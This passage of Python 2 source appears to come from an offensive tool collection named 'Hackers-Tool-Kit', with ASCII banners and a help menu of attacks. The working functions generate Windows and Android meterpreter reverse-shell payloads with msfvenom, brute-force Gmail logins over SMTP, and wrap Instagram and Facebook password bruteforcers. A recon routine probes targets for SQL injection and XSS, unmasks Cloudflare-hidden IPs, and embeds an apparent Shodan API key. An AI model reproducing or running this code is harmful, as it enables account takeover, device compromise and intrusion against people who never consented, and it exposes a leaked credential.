░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,17) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - 